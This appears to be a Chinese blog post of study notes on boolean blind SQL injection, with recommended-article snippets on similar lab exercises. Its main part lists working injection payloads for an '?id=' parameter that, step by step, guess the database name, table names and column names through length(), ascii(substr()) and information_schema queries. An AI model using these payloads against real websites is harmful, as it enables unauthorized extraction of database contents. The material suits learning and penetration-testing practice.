sql注入盲注笔记

最新推荐文章于 2024-04-08 14:44:20 发布
最新推荐文章于 2024-04-08 14:44:20 发布
阅读量274 收藏 2
点赞数
分类专栏: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Long_gone/article/details/103618345
版权

1. 先猜一下数据库的字符长度

?id= 1’ and length(database())=1 (2,3,4…) --+ 其他两个盲注函数 left mid
(需要重复操作)

2. 确定字符长度后,挨个猜字符,由此爆出库名

?id= 1’ and ascii(substr(database(),1,1))>97 (ascii码的十进制的对应数)–+
(需要重复操作)

3. 爆出库名后,先猜一下这个库中有几个表

?id= 1’ and (select count(table_name) from information_schema.tables where
table_schema=‘库名’)=1(2,3…)–+
(需要重复操作)

4. 爆出有几个表后,猜第一个表名的字符长度

?id=1’ and length(substr((select table_name from information_schema.tables
where table_schema=‘库名’ limit 0,1),1))=1 (2,3…)–+
(需要重复操作)

5. 知道了字符长度,现在挨个爆表的字符

?id= 1’ and ascii(substr((select table_name from information_schema.tables
where table_schema=‘库名’ limit 0,1),1,1))>97 (ascii码的十进制的对应数)–+
(需要重复操作)

6.爆出表名后,猜测表中的字段名的个数

?id= 1’ and (select count(column_name) from information_schema.columns where
table_name=‘表名’)=1 (2,3…)–+
(需要重复操作)

7.爆出字段名个数后就尝试确定字段名的长度,然后再依照个数依次爆出字段名,采用上述的方法即可!最后爆数据也同样如此!

Long_gone
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院SQL手动注入(字符型)
wxdby的博客
12-08 373
点开环境后,点击这里: 会出现: 从题目或者从网址看到只是一个字符型的注入。首先,我们要判断是否存在判断点 加 ’ and 1=1%23正常.(%23就相当于#,但用#的话结束不了所以就用%23) 存在注入点,然后判断字段数: 判断字段数。order by 5%23报错 order by 4%23,没事: 输入:id=1’ union select 1,2,3,4%23 输入:union se...
SQL注入——盲注
weixin_41487522的博客
04-14 313
SQL注入——盲注 盲注介绍 提到盲注,对应的就是显错注入,显错注入之前我们说过。但是很多时候服务器关闭了错误回显,这时候我们就需要用到盲注。 所谓的盲注就是在服务器没有错误回显的情况下完成注入攻击。服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 布尔盲注: 布尔就是true和flase,也就是说它只会根据你的注入信息返回true或false,也就没有了之前的报错信息。 时间盲注...
SQL注入之布尔盲注笔记
Tester_Ming的博客
04-11 104
1.手工注
SQL盲注详解
永远是少年
07-17 915
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL盲注详解。 一、SQL盲注详解 二、非查询SQL语句介绍 三、SQL盲注类型
【DVWA】20. SQL Injection (Blind)SQL注入盲注(全等级Sqlmap版)
最新发布
Zichel77的博客
04-08 1989
盲注,有两种主要类型,包括布尔盲注和时间盲注
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
SQL注入基础知识点 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造...
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记 手工注入是指攻击者通过构造特殊的输入来inject恶意的 SQL 代码,使得数据库执行恶意的操作。手工注入常用 SQL 语句笔记对 MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍。 一、...
《SQL手工注入笔记
12-17
这篇笔记可能详尽地介绍了SQL注入的基本原理、常见手法以及防御策略。以下是基于这个主题的一些关键知识点: 1. **SQL注入简介**:SQL注入是一种常见的Web应用安全漏洞,攻击者通过输入特定的SQL代码,使应用程序...
sql手注笔记.docx
12-30
SQL注入是一种常见的网络安全漏洞,它发生在应用程序接收用户输入并直接构造SQL查询时,攻击者可以通过注入恶意SQL代码来获取敏感信息、操纵数据库或完全控制数据库系统。以下是对文档中提到的各种SQL注入技术的详细...
sqli-labs靶场练习笔记
11-09
- **核心技能**:熟练掌握SQL注入的基本原理与技术手段,包括联合查询、布尔盲注、时间盲注等。 - **实战经验**:通过解决具体的关卡问题,积累实战经验,提高解决问题的能力。 - **安全意识**:了解SQL注入的危害性...
Sql注入(盲注)
永不垂头的博客
07-29 267
学习笔记Sql注入(盲注) 一、盲注实践: select * from users where (id = 1) and 1<(select count() xxx) – and pid > 100; select * from users where (id = 1) and (1<(select count() xxx)); – and pid > 100; select * from users where (id = 1) and 1<(select count
墨者 - SQL手工注入漏洞测试(MySQL数据库-字符型)
吃肉唐僧的博客
07-06 631
字符型,其实与数字型得注入思路没什么区别,只不过需要注意构造单引号和后面加注释就行了 id=tingjigonggao' order by 1-- 测试 字段个数,发现有4个 试过盲表,admin,manger,失败 老老实实暴库,先测回显位置 id=tingjigongga' union select '1','2','3','4' -- /new_l...
【无标题】
weixin_51387754的博客
10-17 1127
CISP-PTE专注于培养、考核高级实用型网络安全渗透测试安全人才,是业界首个理论与实践相结合的网络安全专项技能水平注册考试。
SQL注入之二阶注入
秋水的博客
09-01 5569
二阶注入简介 注入分类: SQL注入一般分为两类:一阶SQL注入(普通SQL注入),二阶SQL注入 什么是二阶注入? 二阶注入就是无法直接注入,它时指已存储(数据库、文件)的用户输入被读取后再次进入到 SQL 查询语句中导致的注入。 注入原理 注入比较: 一阶SQL注入:       1;一阶SQL注入发生在一个HTTP请求和响应中,对系统的攻击是立即执行的;     ...
布尔盲注怎么用,一看你就明白了。布尔盲注原理+步骤+实战教程
热门推荐
wangyuxiang946的博客
03-16 2万+
写给每一个为了让自己变得更好,而坚持努力的你。
SQL注入-盲注
m0_53820621的博客
08-12 746
SQL注入-盲注
SQL注入--表的
写下些记录
02-08 5112
步骤 表名—&amp;gt;列名—&amp;gt;列长度—&amp;gt;具体值 例如:注入点 http://www.XX.com/index.asp?id=1 解表名:http://www.XX.com/index.asp?id=1 and exists select * from 测的表名 解列名:http://www.XX.com/index.asp?id=1 and exists selec...
皮卡丘sql注入盲注
10-23
皮卡丘SQL注入盲注是一种SQL注入攻击技术,它利用了Web应用程序中存在的安全漏洞,通过构造恶意的SQL语句来获取敏感信息或者执行非授权的操作。盲注是指攻击者无法直接获取数据库中的数据,而是通过不断地试错和推断...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值